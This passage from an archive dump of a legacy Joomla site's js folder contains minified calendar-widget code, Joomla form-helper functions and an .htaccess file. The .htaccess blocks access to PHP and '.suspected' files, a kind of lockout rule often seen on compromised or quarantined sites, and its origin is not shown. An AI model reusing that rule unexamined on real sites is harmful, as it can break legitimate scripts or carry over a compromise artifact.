el.navtype=="undefined"){if(cal.currentDateEl){Calendar.removeClass(cal.currentDateEl,"selected");Calendar.addClass(el,"selected");closing=(cal.currentDateEl==el);if(!closing){cal.currentDateEl=el;}}cal.date.setDateOnly(el.caldate);date=cal.date;var other_month=!(cal.dateClicked=!el.otherMonth);if(!other_month&&!cal.currentDateEl)cal._toggleMultipleDate(new Date(date));else newdate=!el.disabled;if(other_month)cal._init(cal.firstDayOfWeek,date);}else{if(el.navtype==200){Calendar.removeClass(el,"hilite");cal.callCloseHandler();return;}date=new Date(cal.date);if(el.navtype==0)date.setDateOnly(new Date());cal.dateClicked=false;var year=date.getFullYear();var mon=date.getMonth();function setMonth(m){var day=date.getDate();var max=date.getMonthDays(m);if(day>max){date.setDate(max);}date.setMonth(m);};switch(el.navtype){case 400:Calendar.removeClass(el,"hilite");var text=Calendar._TT["ABOUT"];if(typeof text!="undefined"){text+=cal.showsTime?Calendar._TT["ABOUT_TIME"]:"";}else{text="Help and about box text is not translated into this language.\n"+"If you know this language and you feel generous please update\n"+"the corresponding file in \"lang\" subdir to match calendar-en.js\n"+"and send it back to <mihai_bazon@yahoo.com> to get it into the distribution  ;-)\n\n"+"Thank you!\n"+"http://dynarch.com/mishoo/calendar.epl\n";}alert(text);return;case-2:if(year>cal.minYear){date.setFullYear(year-1);}break;case-1:if(mon>0){setMonth(mon-1);}else if(year-->cal.minYear){date.setFullYear(year);setMonth(11);}break;case 1:if(mon<11){setMonth(mon+1);}else if(year<cal.maxYear){date.setFullYear(year+1);setMonth(0);}break;case 2:if(year<cal.maxYear){date.setFullYear(year+1);}break;case 100:cal.setFirstDayOfWeek(el.fdow);return;case 50:var range=el._range;var current=el.innerHTML;for(var i=range.length;--i>=0;)if(range[i]==current)break;if(ev&&ev.shiftKey){if(--i<0)i=range.length-1;}else if(++i>=range.length)i=0;var newval=range[i];el.innerHTML=newval;cal.onUpdateTime();return;case 0:if((typeof cal.getDateStatus=="function")&&cal.getDateStatus(date,date.getFullYear(),date.getMonth(),date.getDate())){return false;}break;}if(!date.equalsTo(cal.date)){cal.setDate(date);newdate=true;}else if(el.navtype==0)newdate=closing=true;}if(newdate){ev&&cal.callHandler();}if(closing){Calendar.removeClass(el,"hilite");ev&&cal.callCloseHandler();}};Calendar.prototype.create=function(_par){var parent=null;if(!_par){parent=document.getElementsByTagName("body")[0];this.isPopup=true;}else{parent=_par;this.isPopup=false;}this.date=this.dateStr?new Date(this.dateStr):new Date();var table=Calendar.createElement("table");this.table=table;table.cellSpacing=0;table.cellPadding=0;table.calendar=this;Calendar.addEvent(table,"mousedown",Calendar.tableMouseDown);var div=Calendar.createElement("div");this.element=div;div.className="calendar";if(this.isPopup){div.style.position="absolute";div.style.display="none";}div.appendChild(table);var thead=Calendar.createElement("thead",table);var cell=null;var row=null;var cal=this;var hh=function(text,cs,navtype){cell=Calendar.createElement("td",row);cell.colSpan=cs;cell.className="button";if(navtype!=0&&Math.abs(navtype)<=2)cell.className+=" nav";Calendar._add_evs(cell);cell.calendar=cal;cell.navtype=navtype;cell.innerHTML="<div unselectable='on'>"+text+"</div>";return cell;};row=Calendar.createElement("tr",thead);var title_length=6;(this.isPopup)&&--title_length;(this.weekNumbers)&&++title_length;hh("?",1,400).ttip=Calendar._TT["INFO"];this.title=hh("",title_length,300);this.title.className="title";if(this.isPopup){this.title.ttip=Calendar._TT["DRAG_TO_MOVE"];this.title.style.cursor="move";hh("&#x00d7;",1,200).ttip=Calendar._TT["CLOSE"];}row=Calendar.createElement("tr",thead);row.className="headrow";this._nav_py=hh("&#x00ab;",1,-2);this._nav_py.ttip=Calendar._TT["PREV_YEAR"];this._nav_pm=hh("&#x2039;",1,-1);this._nav_pm.ttip=Calendar._TT["PREV_MONTH"];this._nav_now=hh(Calendar._TT["TODAY"],this.weekNumbers?4:3,0);this._nav_now.ttip=Calendar._TT["GO_TODAY"];this._nav_nm=hh("&#x203a;",1,1);this._nav_nm.ttip=Calendar._TT["NEXT_MONTH"];this._nav_ny=hh("&#x00bb;",1,2);this._nav_ny.ttip=Calendar._TT["NEXT_YEAR"];row=Calendar.createElement("tr",thead);row.className="daynames";if(this.weekNumbers){cell=Calendar.createElement("td",row);cell.className="name wn";cell.innerHTML=Calendar._TT["WK"];}for(var i=7;i>0;--i){cell=Calendar.createElement("td",row);if(!i){cell.navtype=100;cell.calendar=this;Calendar._add_evs(cell);}}this.firstdayname=(this.weekNumbers)?row.firstChild.nextSibling:row.firstChild;this._displayWeekdays();var tbody=Calendar.createElement("tbody",table);this.tbody=tbody;for(i=6;i>0;--i){row=Calendar.createElement("tr",tbody);if(this.weekNumbers){cell=Calendar.createElement("td",row);}for(var j=7;j>0;--j){cell=Calendar.createElement("td",row);cell.calendar=this;Calendar._add_evs(cell);}}if(this.showsTime){row=Calendar.createElement("tr",tbody);row.className="time";cell=Calendar.createElement("td",row);cell.className="time";cell.colSpan=2;cell.innerHTML=Calendar._TT["TIME"]||"&nbsp;";cell=Calendar.createElement("td",row);cell.className="time";cell.colSpan=this.weekNumbers?4:3;(function(){function makeTimePart(className,init,range_start,range_end){var part=Calendar.createElement("span",cell);part.className=className;part.innerHTML=init;part.calendar=cal;part.ttip=Calendar._TT["TIME_PART"];part.navtype=50;part._range=[];if(typeof range_start!="number")part._range=range_start;else{for(var i=range_start;i<=range_end;++i){var txt;if(i<10&&range_end>=10)txt='0'+i;else txt=''+i;part._range[part._range.length]=txt;}}Calendar._add_evs(part);return part;};var hrs=cal.date.getHours();var mins=cal.date.getMinutes();var t12=!cal.time24;var pm=(hrs>12);if(t12&&pm)hrs-=12;var H=makeTimePart("hour",hrs,t12?1:0,t12?12:23);var span=Calendar.createElement("span",cell);span.innerHTML=":";span.className="colon";var M=makeTimePart("minute",mins,0,59);var AP=null;cell=Calendar.createElement("td",row);cell.className="time";cell.colSpan=2;if(t12)AP=makeTimePart("ampm",pm?"pm":"am",["am","pm"]);else cell.innerHTML="&nbsp;";cal.onSetTime=function(){var pm,hrs=this.date.getHours(),mins=this.date.getMinutes();if(t12){pm=(hrs>=12);if(pm)hrs-=12;if(hrs==0)hrs=12;AP.innerHTML=pm?"pm":"am";}H.innerHTML=(hrs<10)?("0"+hrs):hrs;M.innerHTML=(mins<10)?("0"+mins):mins;};cal.onUpdateTime=function(){var date=this.date;var h=parseInt(H.innerHTML,10);if(t12){if(/pm/i.test(AP.innerHTML)&&h<12)h+=12;else if(/am/i.test(AP.innerHTML)&&h==12)h=0;}var d=date.getDate();var m=date.getMonth();var y=date.getFullYear();date.setHours(h);date.setMinutes(parseInt(M.innerHTML,10));date.setFullYear(y);date.setMonth(m);date.setDate(d);this.dateClicked=false;this.callHandler();};})();}else{this.onSetTime=this.onUpdateTime=function(){};}var tfoot=Calendar.createElement("tfoot",table);row=Calendar.createElement("tr",tfoot);row.className="footrow";cell=hh(Calendar._TT["SEL_DATE"],this.weekNumbers?8:7,300);cell.className="ttip";if(this.isPopup){cell.ttip=Calendar._TT["DRAG_TO_MOVE"];cell.style.cursor="move";}this.tooltips=cell;div=Calendar.createElement("div",this.element);this.monthsCombo=div;div.className="combo";for(i=0;i<Calendar._MN.length;++i){var mn=Calendar.createElement("div");mn.className=Calendar.is_ie?"label-IEfix":"label";mn.month=i;mn.innerHTML=Calendar._SMN[i];div.appendChild(mn);}div=Calendar.createElement("div",this.element);this.yearsCombo=div;div.className="combo";for(i=12;i>0;--i){var yr=Calendar.createElement("div");yr.className=Calendar.is_ie?"label-IEfix":"label";div.appendChild(yr);}this._init(this.firstDayOfWeek,this.date);parent.appendChild(this.element);};Calendar._keyEvent=function(ev){var cal=window._dynarch_popupCalendar;if(!cal||cal.multiple)return false;(Calendar.is_ie)&&(ev=window.event);var act=(Calendar.is_ie||ev.type=="keypress"),K=ev.keyCode;if(ev.ctrlKey){switch(K){case 37:act&&Calendar.cellClick(cal._nav_pm);break;case 38:act&&Calendar.cellClick(cal._nav_py);break;case 39:act&&Calendar.cellClick(cal._nav_nm);break;case 40:act&&Calendar.cellClick(cal._nav_ny);break;default:return false;}}else switch(K){case 32:Calendar.cellClick(cal._nav_now);break;case 27:act&&cal.callCloseHandler();break;case 37:case 38:case 39:case 40:if(act){var prev,x,y,ne,el,step;prev=K==37||K==38;step=(K==37||K==39)?1:7;function setVars(){el=cal.currentDateEl;var p=el.pos;x=p&15;y=p>>4;ne=cal.ar_days[y][x];};setVars();function prevMonth(){var date=new Date(cal.date);date.setDate(date.getDate()-step);cal.setDate(date);};function nextMonth(){var date=new Date(cal.date);date.setDate(date.getDate()+step);cal.setDate(date);};while(1){switch(K){case 37:if(--x>=0)ne=cal.ar_days[y][x];else{x=6;K=38;continue;}break;case 38:if(--y>=0)ne=cal.ar_days[y][x];else{prevMonth();setVars();}break;case 39:if(++x<7)ne=cal.ar_days[y][x];else{x=0;K=40;continue;}break;case 40:if(++y<cal.ar_days.length)ne=cal.ar_days[y][x];else{nextMonth();setVars();}break;}break;}if(ne){if(!ne.disabled)Calendar.cellClick(ne);else if(prev)prevMonth();else nextMonth();}}break;case 13:if(act)Calendar.cellClick(cal.currentDateEl,ev);break;default:return false;}return Calendar.stopEvent(ev);};Calendar.prototype._init=function(firstDayOfWeek,date){var today=new Date(),TY=today.getFullYear(),TM=today.getMonth(),TD=today.getDate();this.table.style.visibility="hidden";var year=date.getFullYear();if(year<this.minYear){year=this.minYear;date.setFullYear(year);}else if(year>this.maxYear){year=this.maxYear;date.setFullYear(year);}this.firstDayOfWeek=firstDayOfWeek;this.date=new Date(date);var month=date.getMonth();var mday=date.getDate();var no_days=date.getMonthDays();date.setDate(1);var day1=(date.getDay()-this.firstDayOfWeek)%7;if(day1<0)day1+=7;date.setDate(-day1);date.setDate(date.getDate()+1);var row=this.tbody.firstChild;var MN=Calendar._SMN[month];var ar_days=this.ar_days=new Array();var weekend=Calendar._TT["WEEKEND"];var dates=this.multiple?(this.datesCells={}):null;for(var i=0;i<6;++i,row=row.nextSibling){var cell=row.firstChild;if(this.weekNumbers){cell.className="day wn";cell.innerHTML=date.getWeekNumber();cell=cell.nextSibling;}row.className="daysrow";var hasdays=false,iday,dpos=ar_days[i]=[];for(var j=0;j<7;++j,cell=cell.nextSibling,date.setDate(iday+1)){iday=date.getDate();var wday=date.getDay();cell.className="day";cell.pos=i<<4|j;dpos[j]=cell;var current_month=(date.getMonth()==month);if(!current_month){if(this.showsOtherMonths){cell.className+=" othermonth";cell.otherMonth=true;}else{cell.className="emptycell";cell.innerHTML="&nbsp;";cell.disabled=true;continue;}}else{cell.otherMonth=false;hasdays=true;}cell.disabled=false;cell.innerHTML=this.getDateText?this.getDateText(date,iday):iday;if(dates)dates[date.print("%Y%m%d")]=cell;if(this.getDateStatus){var status=this.getDateStatus(date,year,month,iday);if(this.getDateToolTip){var toolTip=this.getDateToolTip(date,year,month,iday);if(toolTip)cell.title=toolTip;}if(status===true){cell.className+=" disabled";cell.disabled=true;}else{if(/disabled/i.test(status))cell.disabled=true;cell.className+=" "+status;}}if(!cell.disabled){cell.caldate=new Date(date);cell.ttip="_";if(!this.multiple&&current_month&&iday==mday&&this.hiliteToday){cell.className+=" selected";this.currentDateEl=cell;}if(date.getFullYear()==TY&&date.getMonth()==TM&&iday==TD){cell.className+=" today";cell.ttip+=Calendar._TT["PART_TODAY"];}if(weekend.indexOf(wday.toString())!=-1)cell.className+=cell.otherMonth?" oweekend":" weekend";}}if(!(hasdays||this.showsOtherMonths))row.className="emptyrow";}this.title.innerHTML=Calendar._MN[month]+", "+year;this.onSetTime();this.table.style.visibility="visible";this._initMultipleDates();};Calendar.prototype._initMultipleDates=function(){if(this.multiple){for(var i in this.multiple){var cell=this.datesCells[i];var d=this.multiple[i];if(!d)continue;if(cell)cell.className+=" selected";}}};Calendar.prototype._toggleMultipleDate=function(date){if(this.multiple){var ds=date.print("%Y%m%d");var cell=this.datesCells[ds];if(cell){var d=this.multiple[ds];if(!d){Calendar.addClass(cell,"selected");this.multiple[ds]=date;}else{Calendar.removeClass(cell,"selected");delete this.multiple[ds];}}}};Calendar.prototype.setDateToolTipHandler=function(unaryFunction){this.getDateToolTip=unaryFunction;};Calendar.prototype.setDate=function(date){if(!date.equalsTo(this.date)){this._init(this.firstDayOfWeek,date);}};Calendar.prototype.refresh=function(){this._init(this.firstDayOfWeek,this.date);};Calendar.prototype.setFirstDayOfWeek=function(firstDayOfWeek){this._init(firstDayOfWeek,this.date);this._displayWeekdays();};Calendar.prototype.setDateStatusHandler=Calendar.prototype.setDisabledHandler=function(unaryFunction){this.getDateStatus=unaryFunction;};Calendar.prototype.setRange=function(a,z){this.minYear=a;this.maxYear=z;};Calendar.prototype.callHandler=function(){if(this.onSelected){this.onSelected(this,this.date.print(this.dateFormat));}};Calendar.prototype.callCloseHandler=function(){if(this.onClose){this.onClose(this);}this.hideShowCovered();};Calendar.prototype.destroy=function(){var el=this.element.parentNode;el.removeChild(this.element);Calendar._C=null;window._dynarch_popupCalendar=null;};Calendar.prototype.reparent=function(new_parent){var el=this.element;el.parentNode.removeChild(el);new_parent.appendChild(el);};Calendar._checkCalendar=function(ev){var calendar=window._dynarch_popupCalendar;if(!calendar){return false;}var el=Calendar.is_ie?Calendar.getElement(ev):Calendar.getTargetElement(ev);for(;el!=null&&el!=calendar.element;el=el.parentNode);if(el==null){window._dynarch_popupCalendar.callCloseHandler();return Calendar.stopEvent(ev);}};Calendar.prototype.show=function(){var rows=this.table.getElementsByTagName("tr");for(var i=rows.length;i>0;){var row=rows[--i];Calendar.removeClass(row,"rowhilite");var cells=row.getElementsByTagName("td");for(var j=cells.length;j>0;){var cell=cells[--j];Calendar.removeClass(cell,"hilite");Calendar.removeClass(cell,"active");}}this.element.style.display="block";this.hidden=false;if(this.isPopup){window._dynarch_popupCalendar=this;Calendar.addEvent(document,"keydown",Calendar._keyEvent);Calendar.addEvent(document,"keypress",Calendar._keyEvent);Calendar.addEvent(document,"mousedown",Calendar._checkCalendar);}this.hideShowCovered();};Calendar.prototype.hide=function(){if(this.isPopup){Calendar.removeEvent(document,"keydown",Calendar._keyEvent);Calendar.removeEvent(document,"keypress",Calendar._keyEvent);Calendar.removeEvent(document,"mousedown",Calendar._checkCalendar);}this.element.style.display="none";this.hidden=true;this.hideShowCovered();};Calendar.prototype.showAt=function(x,y){var s=this.element.style;s.left=x+"px";s.top=y+"px";this.show();};Calendar.prototype.showAtElement=function(el,opts){var self=this;var p=Calendar.getAbsolutePos(el);if(!opts||typeof opts!="string"){this.showAt(p.x,p.y+el.offsetHeight);return true;}function fixPosition(box){if(box.x<0)box.x=0;if(box.y<0)box.y=0;var cp=document.createElement("div");var s=cp.style;s.position="absolute";s.right=s.bottom=s.width=s.height="0px";document.body.appendChild(cp);var br=Calendar.getAbsolutePos(cp);document.body.removeChild(cp);if(Calendar.is_ie){br.y+=document.body.scrollTop;br.x+=document.body.scrollLeft;}else{br.y+=window.scrollY;br.x+=window.scrollX;}var tmp=box.x+box.width-br.x;if(tmp>0)box.x-=tmp;tmp=box.y+box.height-br.y;if(tmp>0)box.y-=tmp;};this.element.style.display="block";Calendar.continuation_for_the_fucking_khtml_browser=function(){var w=self.element.offsetWidth;var h=self.element.offsetHeight;self.element.style.display="none";var valign=opts.substr(0,1);var halign="l";if(opts.length>1){halign=opts.substr(1,1);}switch(valign){case "T":p.y-=h;break;case "B":p.y+=el.offsetHeight;break;case "C":p.y+=(el.offsetHeight-h)/2;break;case "t":p.y+=el.offsetHeight-h;break;case "b":break;}switch(halign){case "L":p.x-=w;break;case "R":p.x+=el.offsetWidth;break;case "C":p.x+=(el.offsetWidth-w)/2;break;case "l":p.x+=el.offsetWidth-w;break;case "r":break;}p.width=w;p.height=h+40;self.monthsCombo.style.display="none";fixPosition(p);self.showAt(p.x,p.y);};if(Calendar.is_khtml)setTimeout("Calendar.continuation_for_the_fucking_khtml_browser()",10);else Calendar.continuation_for_the_fucking_khtml_browser();};Calendar.prototype.setDateFormat=function(str){this.dateFormat=str;};Calendar.prototype.setTtDateFormat=function(str){this.ttDateFormat=str;};Calendar.prototype.parseDate=function(str,fmt){if(!fmt)fmt=this.dateFormat;this.setDate(Date.parseDate(str,fmt));};Calendar.prototype.hideShowCovered=function(){if(!Calendar.is_ie&&!Calendar.is_opera)return;function getVisib(obj){var value=obj.style.visibility;if(!value){if(document.defaultView&&typeof(document.defaultView.getComputedStyle)=="function"){if(!Calendar.is_khtml)value=document.defaultView. getComputedStyle(obj,"").getPropertyValue("visibility");else value='';}else if(obj.currentStyle){value=obj.currentStyle.visibility;}else value='';}return value;};var tags=new Array("applet","iframe","select");var el=this.element;var p=Calendar.getAbsolutePos(el);var EX1=p.x;var EX2=el.offsetWidth+EX1;var EY1=p.y;var EY2=el.offsetHeight+EY1;for(var k=tags.length;k>0;){var ar=document.getElementsByTagName(tags[--k]);var cc=null;for(var i=ar.length;i>0;){cc=ar[--i];p=Calendar.getAbsolutePos(cc);var CX1=p.x;var CX2=cc.offsetWidth+CX1;var CY1=p.y;var CY2=cc.offsetHeight+CY1;if(this.hidden||(CX1>EX2)||(CX2<EX1)||(CY1>EY2)||(CY2<EY1)){if(!cc.__msh_save_visibility){cc.__msh_save_visibility=getVisib(cc);}cc.style.visibility=cc.__msh_save_visibility;}else{if(!cc.__msh_save_visibility){cc.__msh_save_visibility=getVisib(cc);}cc.style.visibility="hidden";}}}};Calendar.prototype._displayWeekdays=function(){var fdow=this.firstDayOfWeek;var cell=this.firstdayname;var weekend=Calendar._TT["WEEKEND"];for(var i=0;i<7;++i){cell.className="day name";var realday=(i+fdow)%7;if(i){cell.ttip=Calendar._TT["DAY_FIRST"].replace("%s",Calendar._DN[realday]);cell.navtype=100;cell.calendar=this;cell.fdow=realday;Calendar._add_evs(cell);}if(weekend.indexOf(realday.toString())!=-1){Calendar.addClass(cell,"weekend");}cell.innerHTML=Calendar._SDN[(i+fdow)%7];cell=cell.nextSibling;}};Calendar.prototype._hideCombos=function(){this.monthsCombo.style.display="none";this.yearsCombo.style.display="none";};Calendar.prototype._dragStart=function(ev){if(this.dragging){return;}this.dragging=true;var posX;var posY;if(Calendar.is_ie){posY=window.event.clientY+document.body.scrollTop;posX=window.event.clientX+document.body.scrollLeft;}else{posY=ev.clientY+window.scrollY;posX=ev.clientX+window.scrollX;}var st=this.element.style;this.xOffs=posX-parseInt(st.left);this.yOffs=posY-parseInt(st.top);with(Calendar){addEvent(document,"mousemove",calDragIt);addEvent(document,"mouseup",calDragEnd);}};Date._MD=new Array(31,28,31,30,31,30,31,31,30,31,30,31);Date.SECOND=1000;Date.MINUTE=60*Date.SECOND;Date.HOUR=60*Date.MINUTE;Date.DAY=24*Date.HOUR;Date.WEEK=7*Date.DAY;Date.parseDate=function(str,fmt){var today=new Date();var y=0;var m=-1;var d=0;var a=str.split(/\W+/);var b=fmt.match(/%./g);var i=0,j=0;var hr=0;var min=0;for(i=0;i<a.length;++i){if(!a[i])continue;switch(b[i]){case "%d":case "%e":d=parseInt(a[i],10);break;case "%m":m=parseInt(a[i],10)-1;break;case "%Y":case "%y":y=parseInt(a[i],10);(y<100)&&(y+=(y>29)?1900:2000);break;case "%b":case "%B":for(j=0;j<12;++j){if(Calendar._MN[j].substr(0,a[i].length).toLowerCase()==a[i].toLowerCase()){m=j;break;}}break;case "%H":case "%I":case "%k":case "%l":hr=parseInt(a[i],10);break;case "%P":case "%p":if(/pm/i.test(a[i])&&hr<12)hr+=12;else if(/am/i.test(a[i])&&hr>=12)hr-=12;break;case "%M":min=parseInt(a[i],10);break;}}if(isNaN(y))y=today.getFullYear();if(isNaN(m))m=today.getMonth();if(isNaN(d))d=today.getDate();if(isNaN(hr))hr=today.getHours();if(isNaN(min))min=today.getMinutes();if(y!=0&&m!=-1&&d!=0)return new Date(y,m,d,hr,min,0);y=0;m=-1;d=0;for(i=0;i<a.length;++i){if(a[i].search(/[a-zA-Z]+/)!=-1){var t=-1;for(j=0;j<12;++j){if(Calendar._MN[j].substr(0,a[i].length).toLowerCase()==a[i].toLowerCase()){t=j;break;}}if(t!=-1){if(m!=-1){d=m+1;}m=t;}}else if(parseInt(a[i],10)<=12&&m==-1){m=a[i]-1;}else if(parseInt(a[i],10)>31&&y==0){y=parseInt(a[i],10);(y<100)&&(y+=(y>29)?1900:2000);}else if(d==0){d=a[i];}}if(y==0)y=today.getFullYear();if(m!=-1&&d!=0)return new Date(y,m,d,hr,min,0);return today;};Date.prototype.getMonthDays=function(month){var year=this.getFullYear();if(typeof month=="undefined"){month=this.getMonth();}if(((0==(year%4))&&((0!=(year%100))||(0==(year%400))))&&month==1){return 29;}else{return Date._MD[month];}};Date.prototype.getDayOfYear=function(){var now=new Date(this.getFullYear(),this.getMonth(),this.getDate(),0,0,0);var then=new Date(this.getFullYear(),0,0,0,0,0);var time=now-then;return Math.floor(time/Date.DAY);};Date.prototype.getWeekNumber=function(){var d=new Date(this.getFullYear(),this.getMonth(),this.getDate(),0,0,0);var DoW=d.getDay();d.setDate(d.getDate()-(DoW+6)%7+3);var ms=d.valueOf();d.setMonth(0);d.setDate(4);return Math.round((ms-d.valueOf())/(7*864e5))+1;};Date.prototype.equalsTo=function(date){return((this.getFullYear()==date.getFullYear())&&(this.getMonth()==date.getMonth())&&(this.getDate()==date.getDate())&&(this.getHours()==date.getHours())&&(this.getMinutes()==date.getMinutes()));};Date.prototype.setDateOnly=function(date){var tmp=new Date(date);this.setDate(1);this.setFullYear(tmp.getFullYear());this.setMonth(tmp.getMonth());this.setDate(tmp.getDate());};Date.prototype.print=function(str){var m=this.getMonth();var d=this.getDate();var y=this.getFullYear();var wn=this.getWeekNumber();var w=this.getDay();var s={};var hr=this.getHours();var pm=(hr>=12);var ir=(pm)?(hr-12):hr;var dy=this.getDayOfYear();if(ir==0)ir=12;var min=this.getMinutes();var sec=this.getSeconds();s["%a"]=Calendar._SDN[w];s["%A"]=Calendar._DN[w];s["%b"]=Calendar._SMN[m];s["%B"]=Calendar._MN[m];s["%C"]=1+Math.floor(y/100);s["%d"]=(d<10)?("0"+d):d;s["%e"]=d;s["%H"]=(hr<10)?("0"+hr):hr;s["%I"]=(ir<10)?("0"+ir):ir;s["%j"]=(dy<100)?((dy<10)?("00"+dy):("0"+dy)):dy;s["%k"]=hr;s["%l"]=ir;s["%m"]=(m<9)?("0"+(1+m)):(1+m);s["%M"]=(min<10)?("0"+min):min;s["%n"]="\n";s["%p"]=pm?"PM":"AM";s["%P"]=pm?"pm":"am";s["%s"]=Math.floor(this.getTime()/1000);s["%S"]=(sec<10)?("0"+sec):sec;s["%t"]="\t";s["%U"]=s["%W"]=s["%V"]=(wn<10)?("0"+wn):wn;s["%u"]=w+1;s["%w"]=w;s["%y"]=(''+y).substr(2,2);s["%Y"]=y;s["%%"]="%";var re=/%./g;if(!Calendar.is_ie5&&!Calendar.is_khtml)return str.replace(re,function(par){return s[par]||par;});var a=str.match(re);for(var i=0;i<a.length;i++){var tmp=s[a[i]];if(tmp){re=new RegExp(a[i],'g');str=str.replace(re,tmp);}}return str;};Date.prototype.__msh_oldSetFullYear=Date.prototype.setFullYear;Date.prototype.setFullYear=function(y){var d=new Date(this);d.__msh_oldSetFullYear(y);if(d.getMonth()!=this.getMonth())this.setDate(28);this.__msh_oldSetFullYear(y);};window._dynarch_popupCalendar=null;js/calendar/.htaccess000044400000000424152434416630010535 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>js/calendar/calendar_function.js000060400000036360152434416630012761 0ustar00// <?php !! This fools phpdocumentor into parsing this file
/**
* @version		$Id: joomla.javascript.js 14401 2010-01-26 14:10:00Z louis $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license		GNU/GPL
* Joomla! is Free Software
*/

/**
 * Overlib Styling Declarations to allow CSS class override of styles
 *
 */
var ol_fgclass='ol-foreground';
var ol_bgclass='ol-background';
var ol_textfontclass='ol-textfont';
var ol_captionfontclass='ol-captionfont';
var ol_closefontclass='ol-closefont';

// general utility for browsing a named array or object
function xshow(o) {
	s = '';
	for(e in o) {s += e+'='+o[e]+'\n';}
	alert( s );
}

/**
* Writes a dynamically generated list
* @param string The parameters to insert into the <select> tag
* @param array A javascript array of list options in the form [key,value,text]
* @param string The key to display for the initial state of the list
* @param string The original key that was selected
* @param string The original item value that was selected
*/
function writeDynaList( selectParams, source, key, orig_key, orig_val ) {
	var html = '\n	<select ' + selectParams + '>';
	var i = 0;
	for (x in source) {
		if (source[x][0] == key) {
			var selected = '';
			if ((orig_key == key && orig_val == source[x][1]) || (i == 0 && orig_key != key)) {
				selected = 'selected="selected"';
			}
			html += '\n		<option value="'+source[x][1]+'" '+selected+'>'+source[x][2]+'</option>';
		}
		i++;
	}
	html += '\n	</select>';

	document.writeln( html );
}

/**
* Changes a dynamically generated list
* @param string The name of the list to change
* @param array A javascript array of list options in the form [key,value,text]
* @param string The key to display
* @param string The original key that was selected
* @param string The original item value that was selected
*/
function changeDynaList( listname, source, key, orig_key, orig_val ) {
	var list = eval( 'document.adminForm.' + listname );

	// empty the list
	for (i in list.options.length) {
		list.options[i] = null;
	}
	i = 0;
	for (x in source) {
		if (source[x][0] == key) {
			opt = new Option();
			opt.value = source[x][1];
			opt.text = source[x][2];

			if ((orig_key == key && orig_val == opt.value) || i == 0) {
				opt.selected = true;
			}
			list.options[i++] = opt;
		}
	}
	list.length = i;
}

/**
* Adds a select item(s) from one list to another
*/
function addSelectedToList( frmName, srcListName, tgtListName ) {
	var form = eval( 'document.' + frmName );
	var srcList = eval( 'form.' + srcListName );
	var tgtList = eval( 'form.' + tgtListName );

	var srcLen = srcList.length;
	var tgtLen = tgtList.length;
	var tgt = "x";

	//build array of target items
	for (var i=tgtLen-1; i > -1; i--) {
		tgt += "," + tgtList.options[i].value + ","
	}

	//Pull selected resources and add them to list
	//for (var i=srcLen-1; i > -1; i--) {
	for (var i=0; i < srcLen; i++) {
		if (srcList.options[i].selected && tgt.indexOf( "," + srcList.options[i].value + "," ) == -1) {
			opt = new Option( srcList.options[i].text, srcList.options[i].value );
			tgtList.options[tgtList.length] = opt;
		}
	}
}

function delSelectedFromList( frmName, srcListName ) {
	var form = eval( 'document.' + frmName );
	var srcList = eval( 'form.' + srcListName );

	var srcLen = srcList.length;

	for (var i=srcLen-1; i > -1; i--) {
		if (srcList.options[i].selected) {
			srcList.options[i] = null;
		}
	}
}

function moveInList( frmName, srcListName, index, to) {
	var form = eval( 'document.' + frmName );
	var srcList = eval( 'form.' + srcListName );
	var total = srcList.options.length-1;

	if (index == -1) {
		return false;
	}
	if (to == +1 && index == total) {
		return false;
	}
	if (to == -1 && index == 0) {
		return false;
	}

	var items = new Array;
	var values = new Array;

	for (i=total; i >= 0; i--) {
		items[i] = srcList.options[i].text;
		values[i] = srcList.options[i].value;
	}
	for (i = total; i >= 0; i--) {
		if (index == i) {
			srcList.options[i + to] = new Option(items[i],values[i], 0, 1);
			srcList.options[i] = new Option(items[i+to], values[i+to]);
			i--;
		} else {
			srcList.options[i] = new Option(items[i], values[i]);
	   }
	}
	srcList.focus();
	return true;
}

function getSelectedOption( frmName, srcListName ) {
	var form = eval( 'document.' + frmName );
	var srcList = eval( 'form.' + srcListName );

	i = srcList.selectedIndex;
	if (i != null && i > -1) {
		return srcList.options[i];
	} else {
		return null;
	}
}

function setSelectedValue( frmName, srcListName, value ) {
	var form = eval( 'document.' + frmName );
	var srcList = eval( 'form.' + srcListName );

	var srcLen = srcList.length;

	for (var i=0; i < srcLen; i++) {
		srcList.options[i].selected = false;
		if (srcList.options[i].value == value) {
			srcList.options[i].selected = true;
		}
	}
}

function getSelectedRadio( frmName, srcGroupName ) {
	var form = eval( 'document.' + frmName );
	var srcGroup = eval( 'form.' + srcGroupName );

	return radioGetCheckedValue( srcGroup );
}

// return the value of the radio button that is checked
// return an empty string if none are checked, or
// there are no radio buttons
function radioGetCheckedValue(radioObj) {
	if (!radioObj) {
		return '';
	}
	var n = radioObj.length;
	if (n == undefined) {
		if (radioObj.checked) {
			return radioObj.value;
		} else {
			return '';
		}
	}
	for (var i = 0; i < n; i++) {
		if(radioObj[i].checked) {
			return radioObj[i].value;
		}
	}
	return '';
}

function getSelectedValue( frmName, srcListName ) {
	var form = eval( 'document.' + frmName );
	var srcList = eval( 'form.' + srcListName );

	i = srcList.selectedIndex;
	if (i != null && i > -1) {
		return srcList.options[i].value;
	} else {
		return null;
	}
}

function getSelectedText( frmName, srcListName ) {
	var form = eval( 'document.' + frmName );
	var srcList = eval( 'form.' + srcListName );

	i = srcList.selectedIndex;
	if (i != null && i > -1) {
		return srcList.options[i].text;
	} else {
		return null;
	}
}

function chgSelectedValue( frmName, srcListName, value ) {
	var form = eval( 'document.' + frmName );
	var srcList = eval( 'form.' + srcListName );

	i = srcList.selectedIndex;
	if (i != null && i > -1) {
		srcList.options[i].value = value;
		return true;
	} else {
		return false;
	}
}

/**
* Toggles the check state of a group of boxes
*
* Checkboxes must have an id attribute in the form cb0, cb1...
* @param The number of box to 'check'
* @param An alternative field name
*/

function listItemTask( id, task ) {
    var f = document.adminForm;
    cb = eval( 'f.' + id );
    if (cb) {
        for (i = 0; true; i++) {
            cbx = eval('f.cb'+i);
            if (!cbx) break;
            cbx.checked = false;
        } // for
        cb.checked = true;
        f.boxchecked.value = 1;
        submitbutton(task);
    }
    return false;
}

function hideMainMenu() {
	if (document.adminForm.hidemainmenu) {
		document.adminForm.hidemainmenu.value=1;
	}
